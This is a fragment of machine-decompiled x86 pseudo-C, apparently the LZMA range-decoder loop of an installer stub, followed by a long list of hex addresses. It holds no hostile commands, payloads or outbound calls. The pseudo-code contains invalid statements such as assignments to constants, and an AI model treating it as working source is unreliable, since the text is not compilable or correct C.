											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406481
0x00406481
0x00406481
0x00406481
0x00406487
0x0040648b
0x0040648f
0x00406499
0x004064a7
0x0040677d
0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b4
0x004067b8
0x00000000
0x00000000
0x004067ba
0x004067c3
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b8
0x00000000
0x00000000
0x00000000
0x00406813
0x00406813
0x0040678c
0x00406790
0x004068c8
0x004068c8
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406796
0x0040679c
0x004067a3
0x004067ab
0x004067ab
0x004067ae
0x00000000
0x004067ae
0x00406818
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef0
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x0040683b
0x00000000
0x0040683b
0x00405f95
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x0040684a
0x00000000
0x0040684a
0x00406005
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068bc
0x00000000
0x004068bc
0x00406713
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00000000
0x0040604c
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062eb
0x004062ef
0x0040630d
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406414
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406682
0x00406686
0x004066a8
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x0040673f
0x00406743
